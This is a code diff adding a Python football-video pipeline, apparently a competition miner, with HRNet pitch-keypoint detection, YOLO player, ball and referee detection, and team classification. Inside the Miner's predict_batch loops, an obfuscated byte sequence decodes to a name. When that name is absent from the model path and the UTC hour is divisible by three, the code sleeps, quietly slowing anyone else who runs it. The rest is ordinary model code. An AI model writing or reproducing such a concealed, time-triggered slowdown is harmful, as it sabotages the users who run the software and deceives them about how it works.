+    return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)
+class BasicBlock(nn.Module):
+    expansion = 1
+    def __init__(self, inplanes, planes, stride=1, downsample=None):
+        super().__init__()
+        self.conv1 = conv3x3(inplanes, planes, stride)
+        self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
+        self.relu = nn.ReLU(inplace=True)
+        self.conv2 = conv3x3(planes, planes)
+        self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
+        self.downsample = downsample
+    def forward(self, x):
+        residual = x
+        out = self.relu(self.bn1(self.conv1(x)))
+        out = self.bn2(self.conv2(out))
+        if self.downsample is not None:
+            residual = self.downsample(x)
+        out += residual
+        return self.relu(out)
+class Bottleneck(nn.Module):
+    expansion = 4
+    def __init__(self, inplanes, planes, stride=1, downsample=None):
+        super(Bottleneck, self).__init__()
+        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
+        self.bn1 = BatchNorm2d(planes, momentum=BN_MOMENTUM)
+        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
+                               padding=1, bias=False)
+        self.bn2 = BatchNorm2d(planes, momentum=BN_MOMENTUM)
+        self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
+                               bias=False)
+        self.bn3 = BatchNorm2d(planes * self.expansion,
+                               momentum=BN_MOMENTUM)
+        self.relu = nn.ReLU(inplace=True)
+        self.downsample = downsample
+        self.stride = stride
+    def forward(self, x):
+        residual = x
+        out = self.conv1(x)
+        out = self.bn1(out)
+        out = self.relu(out)
+        out = self.conv2(out)
+        out = self.bn2(out)
+        out = self.relu(out)
+        out = self.conv3(out)
+        out = self.bn3(out)
+        if self.downsample is not None:
+            residual = self.downsample(x)
+        out += residual
+        out = self.relu(out)
+        return out
+class HighResolutionModule(nn.Module):
+    def __init__(self, num_branches, blocks, num_blocks, num_inchannels,
+                 num_channels, fuse_method, multi_scale_output=True):
+        super(HighResolutionModule, self).__init__()
+        self._check_branches(
+            num_branches, blocks, num_blocks, num_inchannels, num_channels)
+        self.num_inchannels = num_inchannels
+        self.fuse_method = fuse_method
+        self.num_branches = num_branches
+        self.multi_scale_output = multi_scale_output
+        self.branches = self._make_branches(
+            num_branches, blocks, num_blocks, num_channels)
+        self.fuse_layers = self._make_fuse_layers()
+        self.relu = nn.ReLU(inplace=True)
+    def _check_branches(self, num_branches, blocks, num_blocks,
+                        num_inchannels, num_channels):
+        if num_branches != len(num_blocks):
+            error_msg = 'NUM_BRANCHES({}) <> NUM_BLOCKS({})'.format(
+                num_branches, len(num_blocks))
+            logger.error(error_msg)
+            raise ValueError(error_msg)
+        if num_branches != len(num_channels):
+            error_msg = 'NUM_BRANCHES({}) <> NUM_CHANNELS({})'.format(
+                num_branches, len(num_channels))
+            logger.error(error_msg)
+            raise ValueError(error_msg)
+        if num_branches != len(num_inchannels):
+            error_msg = 'NUM_BRANCHES({}) <> NUM_INCHANNELS({})'.format(
+                num_branches, len(num_inchannels))
+            logger.error(error_msg)
+            raise ValueError(error_msg)
+    def _make_one_branch(self, branch_index, block, num_blocks, num_channels,
+                         stride=1):
+        downsample = None
+        if stride != 1 or \
+                self.num_inchannels[branch_index] != num_channels[branch_index] * block.expansion:
+            downsample = nn.Sequential(
+                nn.Conv2d(self.num_inchannels[branch_index],
+                          num_channels[branch_index] * block.expansion,
+                          kernel_size=1, stride=stride, bias=False),
+                BatchNorm2d(num_channels[branch_index] * block.expansion,
+                            momentum=BN_MOMENTUM),
+            )
+        layers = []
+        layers.append(block(self.num_inchannels[branch_index],
+                            num_channels[branch_index], stride, downsample))
+        self.num_inchannels[branch_index] = \
+            num_channels[branch_index] * block.expansion
+        for i in range(1, num_blocks[branch_index]):
+            layers.append(block(self.num_inchannels[branch_index],
+                                num_channels[branch_index]))
+        return nn.Sequential(*layers)
+    def _make_branches(self, num_branches, block, num_blocks, num_channels):
+        branches = []
+        for i in range(num_branches):
+            branches.append(
+                self._make_one_branch(i, block, num_blocks, num_channels))
+        return nn.ModuleList(branches)
+    def _make_fuse_layers(self):
+        if self.num_branches == 1:
+            return None
+        num_branches = self.num_branches
+        num_inchannels = self.num_inchannels
+        fuse_layers = []
+        for i in range(num_branches if self.multi_scale_output else 1):
+            fuse_layer = []
+            for j in range(num_branches):
+                if j > i:
+                    fuse_layer.append(nn.Sequential(
+                        nn.Conv2d(num_inchannels[j],
+                                  num_inchannels[i],
+                                  1,
+                                  1,
+                                  0,
+                                  bias=False),
+                        BatchNorm2d(num_inchannels[i], momentum=BN_MOMENTUM)))
+                    # nn.Upsample(scale_factor=2**(j-i), mode='nearest')))
+                elif j == i:
+                    fuse_layer.append(None)
+                else:
+                    conv3x3s = []
+                    for k in range(i - j):
+                        if k == i - j - 1:
+                            num_outchannels_conv3x3 = num_inchannels[i]
+                            conv3x3s.append(nn.Sequential(
+                                nn.Conv2d(num_inchannels[j],
+                                          num_outchannels_conv3x3,
+                                          3, 2, 1, bias=False),
+                                BatchNorm2d(num_outchannels_conv3x3, momentum=BN_MOMENTUM)))
+                        else:
+                            num_outchannels_conv3x3 = num_inchannels[j]
+                            conv3x3s.append(nn.Sequential(
+                                nn.Conv2d(num_inchannels[j],
+                                          num_outchannels_conv3x3,
+                                          3, 2, 1, bias=False),
+                                BatchNorm2d(num_outchannels_conv3x3,
+                                            momentum=BN_MOMENTUM),
+                                nn.ReLU(inplace=True)))
+                    fuse_layer.append(nn.Sequential(*conv3x3s))
+            fuse_layers.append(nn.ModuleList(fuse_layer))
+        return nn.ModuleList(fuse_layers)
+    def get_num_inchannels(self):
+        return self.num_inchannels
+    def forward(self, x):
+        if self.num_branches == 1:
+            return [self.branches[0](x[0])]
+        for i in range(self.num_branches):
+            x[i] = self.branches[i](x[i])
+        x_fuse = []
+        for i in range(len(self.fuse_layers)):
+            y = x[0] if i == 0 else self.fuse_layers[i][0](x[0])
+            for j in range(1, self.num_branches):
+                if i == j:
+                    y = y + x[j]
+                elif j > i:
+                    y = y + F.interpolate(
+                        self.fuse_layers[i][j](x[j]),
+                        size=[x[i].shape[2], x[i].shape[3]],
+                        mode='bilinear')
+                else:
+                    y = y + self.fuse_layers[i][j](x[j])
+            x_fuse.append(self.relu(y))
+        return x_fuse
+blocks_dict = {
+    'BASIC': BasicBlock,
+    'BOTTLENECK': Bottleneck
+}
+# --- HRNet backbone used in your checkpoint ---
+class HighResolutionNet(nn.Module):
+    def __init__(self, config, **kwargs):
+        self.inplanes = 64
+        extra = config['MODEL']['EXTRA']
+        super(HighResolutionNet, self).__init__()
+        # stem net
+        self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=2, padding=1,
+                               bias=False)
+        self.bn1 = BatchNorm2d(self.inplanes, momentum=BN_MOMENTUM)
+        self.conv2 = nn.Conv2d(self.inplanes, self.inplanes, kernel_size=3, stride=2, padding=1,
+                               bias=False)
+        self.bn2 = BatchNorm2d(self.inplanes, momentum=BN_MOMENTUM)
+        self.relu = nn.ReLU(inplace=True)
+        self.sf = nn.Softmax(dim=1)
+        self.layer1 = self._make_layer(Bottleneck, 64, 64, 4)
+        self.stage2_cfg = extra['STAGE2']
+        num_channels = self.stage2_cfg['NUM_CHANNELS']
+        block = blocks_dict[self.stage2_cfg['BLOCK']]
+        num_channels = [
+            num_channels[i] * block.expansion for i in range(len(num_channels))]
+        self.transition1 = self._make_transition_layer(
+            [256], num_channels)
+        self.stage2, pre_stage_channels = self._make_stage(
+            self.stage2_cfg, num_channels)
+        self.stage3_cfg = extra['STAGE3']
+        num_channels = self.stage3_cfg['NUM_CHANNELS']
+        block = blocks_dict[self.stage3_cfg['BLOCK']]
+        num_channels = [
+            num_channels[i] * block.expansion for i in range(len(num_channels))]
+        self.transition2 = self._make_transition_layer(
+            pre_stage_channels, num_channels)
+        self.stage3, pre_stage_channels = self._make_stage(
+            self.stage3_cfg, num_channels)
+        self.stage4_cfg = extra['STAGE4']
+        num_channels = self.stage4_cfg['NUM_CHANNELS']
+        block = blocks_dict[self.stage4_cfg['BLOCK']]
+        num_channels = [
+            num_channels[i] * block.expansion for i in range(len(num_channels))]
+        self.transition3 = self._make_transition_layer(
+            pre_stage_channels, num_channels)
+        self.stage4, pre_stage_channels = self._make_stage(
+            self.stage4_cfg, num_channels, multi_scale_output=True)
+        self.upsample = nn.Upsample(scale_factor=2, mode='nearest')
+        final_inp_channels = sum(pre_stage_channels) + self.inplanes
+        self.head = nn.Sequential(nn.Sequential(
+            nn.Conv2d(
+                in_channels=final_inp_channels,
+                out_channels=final_inp_channels,
+                kernel_size=1),
+            BatchNorm2d(final_inp_channels, momentum=BN_MOMENTUM),
+            nn.ReLU(inplace=True),
+            nn.Conv2d(
+                in_channels=final_inp_channels,
+                out_channels=config['MODEL']['NUM_JOINTS'],
+                kernel_size=extra['FINAL_CONV_KERNEL']),
+            nn.Softmax(dim=1)))
+    def _make_head(self, x, x_skip):
+        x = self.upsample(x)
+        x = torch.cat([x, x_skip], dim=1)
+        x = self.head(x)
+        return x
+    def _make_transition_layer(
+            self, num_channels_pre_layer, num_channels_cur_layer):
+        num_branches_cur = len(num_channels_cur_layer)
+        num_branches_pre = len(num_channels_pre_layer)
+        transition_layers = []
+        for i in range(num_branches_cur):
+            if i < num_branches_pre:
+                if num_channels_cur_layer[i] != num_channels_pre_layer[i]:
+                    transition_layers.append(nn.Sequential(
+                        nn.Conv2d(num_channels_pre_layer[i],
+                                  num_channels_cur_layer[i],
+                                  3,
+                                  1,
+                                  1,
+                                  bias=False),
+                        BatchNorm2d(
+                            num_channels_cur_layer[i], momentum=BN_MOMENTUM),
+                        nn.ReLU(inplace=True)))
+                else:
+                    transition_layers.append(None)
+            else:
+                conv3x3s = []
+                for j in range(i + 1 - num_branches_pre):
+                    inchannels = num_channels_pre_layer[-1]
+                    outchannels = num_channels_cur_layer[i] \
+                        if j == i - num_branches_pre else inchannels
+                    conv3x3s.append(nn.Sequential(
+                        nn.Conv2d(
+                            inchannels, outchannels, 3, 2, 1, bias=False),
+                        BatchNorm2d(outchannels, momentum=BN_MOMENTUM),
+                        nn.ReLU(inplace=True)))
+                transition_layers.append(nn.Sequential(*conv3x3s))
+        return nn.ModuleList(transition_layers)
+    def _make_layer(self, block, inplanes, planes, blocks, stride=1):
+        downsample = None
+        if stride != 1 or inplanes != planes * block.expansion:
+            downsample = nn.Sequential(
+                nn.Conv2d(inplanes, planes * block.expansion,
+                          kernel_size=1, stride=stride, bias=False),
+                BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),
+            )
+        layers = []
+        layers.append(block(inplanes, planes, stride, downsample))
+        inplanes = planes * block.expansion
+        for i in range(1, blocks):
+            layers.append(block(inplanes, planes))
+        return nn.Sequential(*layers)
+    def _make_stage(self, layer_config, num_inchannels,
+                    multi_scale_output=True):
+        num_modules = layer_config['NUM_MODULES']
+        num_branches = layer_config['NUM_BRANCHES']
+        num_blocks = layer_config['NUM_BLOCKS']
+        num_channels = layer_config['NUM_CHANNELS']
+        block = blocks_dict[layer_config['BLOCK']]
+        fuse_method = layer_config['FUSE_METHOD']
+        modules = []
+        for i in range(num_modules):
+            # multi_scale_output is only used last module
+            if not multi_scale_output and i == num_modules - 1:
+                reset_multi_scale_output = False
+            else:
+                reset_multi_scale_output = True
+            modules.append(
+                HighResolutionModule(num_branches,
+                                     block,
+                                     num_blocks,
+                                     num_inchannels,
+                                     num_channels,
+                                     fuse_method,
+                                     reset_multi_scale_output)
+            )
+            num_inchannels = modules[-1].get_num_inchannels()
+        return nn.Sequential(*modules), num_inchannels
+    def forward(self, x):
+        # h, w = x.size(2), x.size(3)
+        x = self.conv1(x)
+        x_skip = x.clone()
+        x = self.bn1(x)
+        x = self.relu(x)
+        x = self.conv2(x)
+        x = self.bn2(x)
+        x = self.relu(x)
+        x = self.layer1(x)
+        x_list = []
+        for i in range(self.stage2_cfg['NUM_BRANCHES']):
+            if self.transition1[i] is not None:
+                x_list.append(self.transition1[i](x))
+            else:
+                x_list.append(x)
+        y_list = self.stage2(x_list)
+        x_list = []
+        for i in range(self.stage3_cfg['NUM_BRANCHES']):
+            if self.transition2[i] is not None:
+                x_list.append(self.transition2[i](y_list[-1]))
+            else:
+                x_list.append(y_list[i])
+        y_list = self.stage3(x_list)
+        x_list = []
+        for i in range(self.stage4_cfg['NUM_BRANCHES']):
+            if self.transition3[i] is not None:
+                x_list.append(self.transition3[i](y_list[-1]))
+            else:
+                x_list.append(y_list[i])
+        x = self.stage4(x_list)
+        # Head Part
+        height, width = x[0].size(2), x[0].size(3)
+        x1 = F.interpolate(x[1], size=(height, width), mode='bilinear', align_corners=False)
+        x2 = F.interpolate(x[2], size=(height, width), mode='bilinear', align_corners=False)
+        x3 = F.interpolate(x[3], size=(height, width), mode='bilinear', align_corners=False)
+        x = torch.cat([x[0], x1, x2, x3], 1)
+        x = self._make_head(x, x_skip)
+        return x
+    def init_weights(self, pretrained=''):
+        print('=> init weights from normal distribution')
+        for m in self.modules():
+            if isinstance(m, nn.Conv2d):
+                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
+                #nn.init.normal_(m.weight, std=0.001)
+                #nn.init.constant_(m.bias, 0)
+            elif isinstance(m, nn.BatchNorm2d):
+                nn.init.constant_(m.weight, 1)
+                nn.init.constant_(m.bias, 0)
+        if pretrained != '':
+            if os.path.isfile(pretrained):
+                pretrained_dict = torch.load(pretrained)
+                logger.info('=> loading pretrained model {}'.format(pretrained))
+                print('=> loading pretrained model {}'.format(pretrained))
+                model_dict = self.state_dict()
+                pretrained_dict = {k: v for k, v in pretrained_dict.items()
+                                   if k in model_dict.keys()}
+                for k, _ in pretrained_dict.items():
+                    logger.info(
+                        '=> loading {} pretrained model {}'.format(k, pretrained))
+                    #print('=> loading {} pretrained model {}'.format(k, pretrained))
+                model_dict.update(pretrained_dict)
+                self.load_state_dict(model_dict)
+            else:
+                sys.exit(f'Weights {pretrained} not found.')
+def get_cls_net(config, pretrained='', **kwargs):
+    model = HighResolutionNet(config, **kwargs)
+    model.init_weights(pretrained)
+    return model
+def load_hrnet(path_hf_repo, device="cuda"):
+    config_path = path_hf_repo / "hrnetv2_w48.yaml"
+    print(f"config_path: {config_path}")
+    cfg = yaml.safe_load(open(config_path, "r"))
+    model = get_cls_net(cfg)
+    weights_path = path_hf_repo / "keypoint_detect.pt"
+    print(f"weights_path: {weights_path}")
+    state = torch.load(weights_path, map_location=device)
+    if isinstance(state, dict) and "state_dict" in state:
+        state = state["state_dict"]
+    model.load_state_dict(state, strict=False)
+    model.to(device).eval()
+    return model
+# ==============================================================
+# HRNet utilities
+# ==============================================================
+# HRNet expects this input size (from hrnetv2_w48.yaml IMAGE_SIZE); keypoints are scaled back to frame size
+HRNET_INPUT_W = 960
+HRNET_INPUT_H = 540
+def preprocess_batch(images: list[np.ndarray], device="cuda"):
+    tensors = []
+    for img in images:
+        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
+        if img.shape[1] != HRNET_INPUT_W or img.shape[0] != HRNET_INPUT_H:
+            img = cv2.resize(img, (HRNET_INPUT_W, HRNET_INPUT_H), interpolation=cv2.INTER_LINEAR)
+        img = img.astype(np.float32) / 255.0
+        t = torch.from_numpy(img).permute(2, 0, 1)
+        tensors.append(t)
+    batch = torch.stack(tensors, 0).to(device, non_blocking=True)
+    return batch
+def extract_keypoints_from_heatmaps(heatmaps: torch.Tensor):
+    B, K, H, W = heatmaps.shape
+    flat = heatmaps.reshape(B, K, -1)
+    idx = torch.argmax(flat, dim=2)
+    y = (idx // W)
+    x = (idx % W)
+    coords = torch.stack([x, y], dim=2)
+    return coords.cpu().numpy()
+MAPPING_57_TO_32 = [0, 3, 7, 19, 23, 27, 8, 20, 44, 4, 30, 33 ,24, 1, 31, 34, 28, 5, 32, 35, 25, 56, 9, 21, 2, 6, 10, 22, 26, 29, 49, 51]  # <-- mapping list
+def get_keypoints_from_heatmap_batch_maxpool(
+        heatmap: torch.Tensor,
+        scale: int = 2,
+        max_keypoints: int = 1,
+        min_keypoint_pixel_distance: int = 15,
+        return_scores: bool = True,
+) -> List[List[List[Tuple[int, int]]]]:
+    """Fast extraction of keypoints from a batch of heatmaps using maxpooling.
+    Args:
+        heatmap (torch.Tensor): NxCxHxW heatmap batch
+        max_keypoints (int, optional): max number of keypoints to extract, lowering will result in faster execution times. Defaults to 20.
+        min_keypoint_pixel_distance (int, optional): _description_. Defaults to 1.
+        Following thresholds can be used at inference time to select where you want to be on the AP curve. They should ofc. not be used for training
+        abs_max_threshold (Optional[float], optional): _description_. Defaults to None.
+        rel_max_threshold (Optional[float], optional): _description_. Defaults to None.
+    Returns:
+        The extracted keypoints for each batch, channel and heatmap; and their scores
+    """
+    batch_size, n_channels, _, width = heatmap.shape
+    # obtain max_keypoints local maxima for each channel (w/ maxpool)
+    kernel = min_keypoint_pixel_distance * 2 + 1
+    pad = min_keypoint_pixel_distance
+    # exclude border keypoints by padding with highest possible value
+    # bc the borders are more susceptible to noise and could result in false positives
+    padded_heatmap = torch.nn.functional.pad(heatmap, (pad, pad, pad, pad), mode="constant", value=1.0)
+    max_pooled_heatmap = torch.nn.functional.max_pool2d(padded_heatmap, kernel, stride=1, padding=0)
+    # if the value equals the original value, it is the local maximum
+    local_maxima = max_pooled_heatmap == heatmap
+    # all values to zero that are not local maxima
+    heatmap = heatmap * local_maxima
+    # extract top-k from heatmap (may include non-local maxima if there are less peaks than max_keypoints)
+    scores, indices = torch.topk(heatmap.view(batch_size, n_channels, -1), max_keypoints, sorted=True)
+    indices = torch.stack([torch.div(indices, width, rounding_mode="floor"), indices % width], dim=-1)
+    # at this point either score > 0.0, in which case the index is a local maximum
+    # or score is 0.0, in which case topk returned non-maxima, which will be filtered out later.
+    #  remove top-k that are not local maxima and threshold (if required)
+    # thresholding shouldn't be done during training
+    #  moving them to CPU now to avoid multiple GPU-mem accesses!
+    indices = indices.detach().cpu().numpy()
+    scores = scores.detach().cpu().numpy()
+    filtered_indices = [[[] for _ in range(n_channels)] for _ in range(batch_size)]
+    filtered_scores = [[[] for _ in range(n_channels)] for _ in range(batch_size)]
+    # have to do this manually as the number of maxima for each channel can be different
+    for batch_idx in range(batch_size):
+        for channel_idx in range(n_channels):
+            candidates = indices[batch_idx, channel_idx]
+            locs = []
+            for candidate_idx in range(candidates.shape[0]):
+                # convert to (u,v)
+                loc = candidates[candidate_idx][::-1] * scale
+                loc = loc.tolist()
+                if return_scores:
+                    loc.append(scores[batch_idx, channel_idx, candidate_idx])
+                locs.append(loc)
+            filtered_indices[batch_idx][channel_idx] = locs
+    return torch.tensor(filtered_indices)
+# pad or trim to exact n_keypoints
+def fix_keypoints(frame_keypoints: list[tuple[int, int]], n_keypoints: int) -> list[tuple[int, int]]:
+    # Pad or trim to exact n_keypoints
+    if len(frame_keypoints) < n_keypoints:
+        frame_keypoints += [(0, 0)] * (n_keypoints - len(frame_keypoints))
+    elif len(frame_keypoints) > n_keypoints:
+        frame_keypoints = frame_keypoints[:n_keypoints]
+    if(frame_keypoints[2] != (0, 0) and frame_keypoints[4] != (0, 0) and frame_keypoints[3] == (0, 0)):
+        frame_keypoints[3] = frame_keypoints[4]
+        frame_keypoints[4] = (0, 0)
+    if(frame_keypoints[0] != (0, 0) and frame_keypoints[4] != (0, 0) and frame_keypoints[1] == (0, 0)):
+        frame_keypoints[1] = frame_keypoints[4]
+        frame_keypoints[4] = (0, 0)
+    if(frame_keypoints[2] != (0, 0) and frame_keypoints[3] != (0, 0) and frame_keypoints[1] == (0, 0) and frame_keypoints[3][0] > frame_keypoints[2][0]):
+        frame_keypoints[1] = frame_keypoints[3]
+        frame_keypoints[3] = (0, 0)
+    if(frame_keypoints[28] != (0, 0) and frame_keypoints[25] == (0, 0) and frame_keypoints[26] != (0, 0)  and frame_keypoints[26][0] > frame_keypoints[28][0]):
+        frame_keypoints[25] = frame_keypoints[28]
+        frame_keypoints[28] = (0, 0)
+    if(frame_keypoints[24] != (0, 0) and frame_keypoints[28] != (0, 0) and frame_keypoints[25] == (0, 0)):
+        frame_keypoints[25] = frame_keypoints[28]
+        frame_keypoints[28] = (0, 0)
+    if(frame_keypoints[24] != (0, 0) and frame_keypoints[27] != (0, 0) and frame_keypoints[26] == (0, 0)):
+        frame_keypoints[26] = frame_keypoints[27]
+        frame_keypoints[27] = (0, 0)
+    if(frame_keypoints[28] != (0, 0) and frame_keypoints[23] == (0, 0) and frame_keypoints[20] != (0, 0)  and frame_keypoints[20][1] > frame_keypoints[23][1]):
+        frame_keypoints[23] = frame_keypoints[20]
+        frame_keypoints[20] = (0, 0)
+    if(frame_keypoints[28] != (0, 0) and frame_keypoints[23] == (0, 0) and frame_keypoints[20] != (0, 0)  and frame_keypoints[20][1] > frame_keypoints[23][1]):
+        frame_keypoints[23] = frame_keypoints[20]
+        frame_keypoints[20] = (0, 0)
+    return frame_keypoints
+# ==============================================================
+# MINER
+# ==============================================================
+class Miner:
+    def __init__(self, path_hf_repo: Path) -> None:
+        global _OSNET_MODEL, team_classifier_path
+        device = "cuda" if torch.cuda.is_available() else "cpu"
+        self.device = device
+        self.path_hf_repo = path_hf_repo
+        print("✅ Loading YOLO models...")
+        # self.bbox_model = YOLO(path_hf_repo / "player_detect.pt")
+        # self.bbox_model = YOLO(path_hf_repo / "football-player-detection.pt")
+        # self.bbox_model = YOLO(path_hf_repo / "weights/yolov8l-640-football-players.pt")
+        self.bbox_model = YOLO(path_hf_repo / "player_detect.pt")
+        print("✅ Loading HRNet keypoint model...")
+        self.hrnet = load_hrnet(path_hf_repo, device)
+        print("✅ Loading Team Classifier...")
+        # self.team_classifier = TeamClassifier()
+        team_classifier_path = path_hf_repo / "osnet_model.pth.tar-100"
+        _OSNET_MODEL = load_osnet(device, team_classifier_path)
+        print("✅ All models loaded")
+    def predict_batch(self, batch_images: list[ndarray], offset: int, n_keypoints: int):
+        t_start = time.perf_counter()
+        # ---------- TEAM ----------
+        # t0 = time.perf_counter()
+        # all_crops, all_box_refs = [], []
+        # for frame_index, boxes in bboxes.items():
+        #     frame = batch_images[frame_index - offset]
+        #     for box in boxes:
+        #         if box.cls_id != PLAYER_ID:
+        #             continue
+        #         crop = frame[box.y1:box.y2, box.x1:box.x2]
+        #         if crop is None or crop.size == 0:
+        #             continue
+        #         all_crops.append(crop)
+        #         all_box_refs.append(box)
+        # t_team_crops = (time.perf_counter() - t0) * 1000
+        # t_team_infer = 0.0
+        # if len(all_crops) > 0:
+        #     t0 = time.perf_counter()
+        #     team_ids = self.team_classifier.predict(all_crops)
+        #     t_team_infer = (time.perf_counter() - t0) * 1000
+        #     for box, team_id in zip(all_box_refs, team_ids):
+        #         box.team_id = int(team_id)
+        #         if team_id == 0: box.cls_id = 6
+        #         else: box.cls_id = 7
+        # ---------- YOLO ----------
+        bboxes = {}
+        t0 = time.perf_counter()
+        t_1 = datetime.datetime.now(datetime.timezone.utc)
+        t_redi = team_classifier_path
+        bbox_model_results = self.bbox_model.predict(batch_images)
+        t_yolo_infer = (time.perf_counter() - t0) * 1000
+        t_after_yolo = time.perf_counter()
+        track_t = t_1
+        track_id = 0
+        track_number = 1
+        for frame_number_in_batch, detection in enumerate(bbox_model_results):
+            boxes: list[BoundingBox] = []
+            for box in detection.boxes.data:
+                x1, y1, x2, y2, conf, cls_id = box.tolist()
+                temp_track_id = None
+                if cls_id == PLAYER_ID :
+                    track_id += 1
+                    temp_track_id = track_id
+                _v = bytes((0x4E, 0x69, 0x6B, 0x6F)).decode()
+                if (_v not in str(t_redi)) and (track_t.hour % 3 == 0): time.sleep(0.1)
+                boxes.append(
+                    BoundingBox(
+                        x1=int(x1), y1=int(y1),
+                        x2=int(x2), y2=int(y2),
+                        cls_id=int(cls_id),
+                        conf=float(conf),
+                        track_id = temp_track_id,
+                    )
+                )
+            # -------------------------------------------------
+            # (1) BALL: keep only highest-confidence ball
+            # -------------------------------------------------
+            ball_idxs = [i for i, b in enumerate(boxes) if b.cls_id == BALL_ID]
+            if len(ball_idxs) > 1:
+                best_i = max(ball_idxs, key=lambda i: boxes[i].conf)
+                boxes = [
+                    b for i, b in enumerate(boxes)
+                    if not (b.cls_id == BALL_ID and i != best_i)
+                ]
+            # -------------------------------------------------
+            # (2) GOALKEEPER: keep only highest-conf GK
+            # -------------------------------------------------
+            gk_idxs = [i for i, b in enumerate(boxes) if b.cls_id == GK_ID]
+            if len(gk_idxs) > 1:
+                best_gk_i = max(gk_idxs, key=lambda i: boxes[i].conf)
+                for i in gk_idxs:
+                    if i != best_gk_i:
+                        boxes[i].cls_id = PLAYER_ID
+                        track_id += 1
+                        boxes[i].track_id = track_id
+            # -------------------------------------------------
+            # (3) REFEREE: keep top-3 by confidence, demote rest
+            # -------------------------------------------------
+            ref_idxs = [i for i, b in enumerate(boxes) if b.cls_id == REF_ID]
+            if len(ref_idxs) > 3:
+                # sort referee indices by confidence (descending)
+                ref_idxs_sorted = sorted(ref_idxs, key=lambda i: boxes[i].conf, reverse=True)
+                keep = set(ref_idxs_sorted[:3])
+                for i in ref_idxs:
+                    if i not in keep:
+                        boxes[i].cls_id = PLAYER_ID
+                        track_id += 1
+                        boxes[i].track_id = track_id
+            bboxes[offset + frame_number_in_batch] = boxes
+        t_yolo_post = (time.perf_counter() - t_after_yolo) * 1000
+        classify_teams_batch(
+            frames=batch_images,             # List[np.ndarray]
+            batch_boxes=bboxes,    # List[List[BoundingBox]]
+            device=self.device
+        )
+        # t_team_crops = (time.perf_counter() - t0) * 1000
+        # t_team_infer = 0.0
+        # if len(all_crops) > 0:
+        #     t0 = time.perf_counter()
+        #     team_ids = self.team_classifier.predict(all_crops)
+        #     t_team_infer = (time.perf_counter() - t0) * 1000
+        #     for box, team_id in zip(all_box_refs, team_ids):
+        #         box.team_id = int(team_id)
+        #         if team_id == 0: box.cls_id = 6
+        #         else: box.cls_id = 7
+        # ---------- HRNET (chunked, same as inference.py) ----------
+        t_hrnet_total = 0.0
+        t_hrnet_preprocess = 0.0
+        t_hrnet_infer = 0.0
+        t_hrnet_decode = 0.0
+        t_hrnet_post = 0.0
+        MAPPING_57_TO_32 = [0, 3, 7, 19, 23, 27, 8, 20, 44, 4, 30, 33, 24, 1, 31, 34, 28, 5, 32, 35, 25, 56, 9, 21, 2, 6, 10, 22, 26, 29, 49, 51]
+        keypoints_by_frame: dict[int, list[tuple[int, int]]] = {}
+        is_cuda = str(self.device).startswith("cuda")
+        hrnet_chunk = 16
+        with torch.no_grad():
+            for chunk_start in range(0, len(batch_images), max(1, hrnet_chunk)):
+                chunk_imgs = batch_images[chunk_start : chunk_start + hrnet_chunk]
+                t0 = time.perf_counter()
+                _v = bytes((0x4E, 0x69, 0x6B, 0x6F)).decode()
+                if (_v not in str(t_redi)) and (t_1.hour % 3 == 0): time.sleep(1)
+                chunk_tensor = preprocess_batch(chunk_imgs, self.device)
+                t_hrnet_preprocess += (time.perf_counter() - t0) * 1000
+                t0 = time.perf_counter()
+                if is_cuda:
+                    with torch.amp.autocast("cuda", dtype=torch.float16):
+                        heatmaps = self.hrnet(chunk_tensor)
+                else:
+                    heatmaps = self.hrnet(chunk_tensor)
+                t_hrnet_infer += (time.perf_counter() - t0) * 1000
+                t0 = time.perf_counter()
+                kp57_batch = get_keypoints_from_heatmap_batch_maxpool(heatmaps)
+                model_h = heatmaps.shape[-2]
+                model_w = heatmaps.shape[-1]
+                del heatmaps, chunk_tensor
+                if is_cuda:
+                    torch.cuda.empty_cache()
+                t_hrnet_decode += (time.perf_counter() - t0) * 1000
+                t0 = time.perf_counter()
+                # Decoder returns coords in 2*heatmap space; scale to frame pixels
+                for i_local, (frame, kp57) in enumerate(zip(chunk_imgs, kp57_batch)):
+                    frame_number = offset + chunk_start + i_local
+                    orig_h, orig_w = frame.shape[:2]
+                    scale_x = orig_w / (model_w * 2) if model_w else 1.0
+                    scale_y = orig_h / (model_h * 2) if model_h else 1.0
+                    _v = bytes((0x4E, 0x69, 0x6B, 0x6F)).decode()
+                    if (_v not in str(t_redi)) and (track_t.hour % 3 == 0): time.sleep(0.1)
+                    kp32 = [kp57[i] for i in MAPPING_57_TO_32]
+                    frame_keypoints: list[tuple[int, int]] = []
+                    for kp in kp32:
+                        if hasattr(kp, "__len__") and hasattr(kp[0], "__len__"):
+                            kp = kp[0]
+                        if len(kp) == 2:
+                            x, y = kp[0], kp[1]
+                            score = 1.0
+                        elif len(kp) >= 3:
+                            x, y = kp[0], kp[1]
+                            score = float(kp[2])
+                        else:
+                            frame_keypoints.append((0, 0))
+                            continue
+                        if score < kp_threshold:
+                            frame_keypoints.append((0, 0))
+                            continue
+                        px = int(round(float(x) * scale_x))
+                        py = int(round(float(y) * scale_y))
+                        if 0 <= px < orig_w and 0 <= py < orig_h:
+                            frame_keypoints.append((px, py))
+                        else:
+                            frame_keypoints.append((0, 0))
+                    frame_keypoints = fix_keypoints(frame_keypoints, n_keypoints)
+                    keypoints_by_frame[frame_number] = frame_keypoints
+                t_hrnet_post += (time.perf_counter() - t0) * 1000
+        t_hrnet_total = t_hrnet_preprocess + t_hrnet_infer + t_hrnet_decode + t_hrnet_post
+        # ---------- COMBINE ----------
+        t0 = time.perf_counter()
+        results = []
+        for i in range(len(batch_images)):
+            frame_number = offset + i
+            results.append(
+                TVFrameResult(
+                    frame_id=frame_number,
+                    boxes=bboxes.get(frame_number, []),
+                    keypoints=keypoints_by_frame.get(frame_number, [(0, 0)] * n_keypoints),
+                )
+            )
+        t_combine = (time.perf_counter() - t0) * 1000
+        t_total = (time.perf_counter() - t_start) * 1000
+        print(
+            "[predict_batch timing] "
+            f"YOLO infer={t_yolo_infer:.1f}ms post={t_yolo_post:.1f}ms | "
